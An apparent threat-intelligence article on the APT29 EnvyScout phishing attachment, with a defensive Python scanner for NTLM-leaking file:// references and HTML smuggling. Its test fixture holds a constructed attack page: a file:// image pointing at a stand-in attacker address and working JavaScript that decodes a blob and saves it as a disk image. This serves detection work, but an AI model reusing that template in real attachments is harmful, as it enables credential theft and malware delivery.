EnvyScout is a malware strain first seen in a phishing campaign that impersonated the United States Agency for International Development (USAID). The operation is attributed to APT29, the same threat actor behind the SolarWinds supply-chain compromise, which the US and UK governments have publicly attributed to Russia's Foreign Intelligence Service (SVR). Other names used for the same actor are Nobelium, SolarStorm, DarkHalo, UNC2452 and StellarParticle.
The attackers compromised a Constant Contact account belonging to USAID (Constant Contact is the mass-mailing service the agency used) and sent phishing emails to roughly 3,000 accounts at more than 150 organizations. The targets included government agencies and organizations involved in human rights, humanitarian work and international development. Microsoft's researchers identified four previously unseen components in the USAID attack chain: an HTML attachment named 'EnvyScout,' a downloader named 'BoomBox,' a loader called 'NativeZone,' and a shellcode downloader named 'VaporRage.' EnvyScout is the first stage delivered to the victim's machine.
Microsoft analyzed the malware used in the USAID attack and published its findings. EnvyScout's job is to drop the next-stage payload onto the victim's system while also capturing and exfiltrating certain data, chiefly the Windows NTLM credentials of the current user. The threat is an HTML/JavaScript file distributed as an attachment named 'NV.html.' When opened, the file attempts to load an image from a file:// URL that points at an attacker-controlled host. Windows resolves such a URL over SMB and will automatically attempt to authenticate to the remote server, so the logged-on user's NetNTLM challenge-response (an NTLM "hash") is sent to the attackers. The plaintext password is not contained in that data, but the attackers can try to recover it offline by brute-forcing the captured hash, or relay the authentication to another service. The leak depends on the victim network allowing outbound SMB (TCP port 445) to the internet; blocking that egress at the perimeter defeats this part of the attack.
EnvyScout escalates the attack through HTML smuggling: the JavaScript in the attachment decodes an embedded text blob into an ISO disk image named 'NV.img' and saves it to the local system, so the payload never crosses the network as a recognizable file and perimeter filters have nothing to inspect. If the user double-clicks the image, Windows mounts it as a virtual drive that shows a single shortcut called NV (NV.lnk). Launching the shortcut executes a hidden file on the image named 'BOOM.exe,' which is the BoomBox downloader, the next stage of the chain. At the time of the campaign, files extracted from a mounted ISO also did not carry the Mark of the Web, so the usual SmartScreen warnings for internet-sourced executables were not shown.
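The two behaviours described above, the file:// image load that leaks NTLM credentials and the HTML smuggling that writes a disk image to disk, both leave static traces in the attachment itself. The following triage script is an added example written for this page, not Microsoft's analysis tooling and not EnvyScout code: it parses an HTML attachment, flags any resource reference that uses a file:// URL or a UNC path, and flags a script that combines an unusually long embedded blob with a browser file-writing sink and a disk-image filename. The attribute list, the 2,048-character blob threshold and the sink names are this example's own assumptions, and the sample HTML (including the TEST-NET-2 address 198.51.100.7 standing in for an attacker host) is constructed for the example rather than taken from the real NV.html.

```python
"""Static triage of an HTML e-mail attachment for EnvyScout-style behaviour.

Added example; thresholds, attribute lists and the sample HTML are assumptions
made for illustration and are not taken from the real NV.html.
"""
import re
from html.parser import HTMLParser

# file:// URL or \\host\share UNC path: Windows fetches these over SMB and
# authenticates to the named host with NetNTLM without asking the user.
FILE_URL = re.compile(r"^(file:|\\\\)", re.IGNORECASE)
# Filenames that would be mounted as a drive when double-clicked.
DISK_IMAGE_NAME = re.compile(r'"([^"]+\.(?:img|iso|vhdx?))"', re.IGNORECASE)
# Browser APIs that turn in-memory bytes into a file on disk (assumed list).
SMUGGLING_SINKS = ("msSaveOrOpenBlob", "createObjectURL", ".download", "download=")
MIN_BLOB_CHARS = 2048  # assumed threshold: a smuggled payload is one huge token


class AttachmentScanner(HTMLParser):
    """Collects file:// references, inline script and visible text while parsing."""

    def __init__(self):
        super().__init__()
        self.leaks = []       # (tag, attribute, value) for file:// or UNC references
        self.script = []      # inline <script> bodies
        self.text = []        # everything else
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for attr, val in attrs:
            if attr in ("src", "href", "data", "background") and val and FILE_URL.match(val.strip()):
                self.leaks.append((tag, attr, val))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.script if self._in_script else self.text).append(data)


def scan_html_attachment(html):
    """Return a list of (kind, detail) findings; an empty list means nothing was flagged."""
    p = AttachmentScanner()
    p.feed(html)
    p.close()
    findings = [("ntlm_leak", f"<{tag} {attr}={val!r}>") for tag, attr, val in p.leaks]

    js = "".join(p.script)
    body = js + "\n" + "".join(p.text)
    # Longest run of non-whitespace characters anywhere in the document.
    blob_len = max((len(m.group(0)) for m in re.finditer(r"\S{%d,}" % MIN_BLOB_CHARS, body)), default=0)
    sinks = [s for s in SMUGGLING_SINKS if s in js]
    image = DISK_IMAGE_NAME.search(js)
    # A huge blob alone is not proof (inline images are large too); require a
    # file-writing sink in the script as well before calling it smuggling.
    if sinks and blob_len >= MIN_BLOB_CHARS:
        detail = f"blob={blob_len} chars, sinks={sinks}"
        if image:
            detail += f", writes disk image {image.group(1)}"
        findings.append(("html_smuggling", detail))
    return findings


# Constructed sample modelled on the behaviour described above; not the real NV.html.
# 198.51.100.7 is a documentation (TEST-NET-2) address standing in for an attacker host.
SAMPLE_HTML = """<html><body>
<img src="file://198.51.100.7/share/logo.png" width="1" height="1">
<p>Please review the attached document.</p>
<script>
var blob = "%s";
function dec(s){var o="";for(var i=0;s.length>i;i++){o+=String.fromCharCode(s.charCodeAt(i)^0x5A);}return o;}
var raw=dec(atob(blob));
var bytes=new Uint8Array(raw.length);for(var i=0;raw.length>i;i++){bytes[i]=raw.charCodeAt(i);}
var f=new Blob([bytes],{type:"application/octet-stream"});
if(window.navigator.msSaveOrOpenBlob){window.navigator.msSaveOrOpenBlob(f,"NV.img");}
else{var a=document.createElement("a");a.href=URL.createObjectURL(f);a.download="NV.img";a.click();}
</script>
</body></html>""" % ("QUJD" * 1024)

# Constructed benign message for comparison: remote HTTPS image, no script.
BENIGN_HTML = '<html><body><img src="https://example.com/logo.png"><p>Hello</p></body></html>'

if __name__ == "__main__":
    for kind, detail in scan_html_attachment(SAMPLE_HTML):
        print(kind, "-", detail)
    print("benign:", scan_html_attachment(BENIGN_HTML))
```

Run against the constructed sample the scanner reports one ntlm_leak finding for the file:// image and one html_smuggling finding naming NV.img, and nothing for the benign message. In a mail gateway this logic belongs on every HTML attachment regardless of sender, since in the USAID campaign the sending account was a legitimate, compromised one; the ntlm_leak check is also cheap to run on HTML mail bodies, not only attachments.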
EnvyScout has also been observed in at least one other phishing campaign. According to security researcher Florian Roth, the same attachment was distributed with phishing emails posing as official correspondence from the Embassy of Belgium.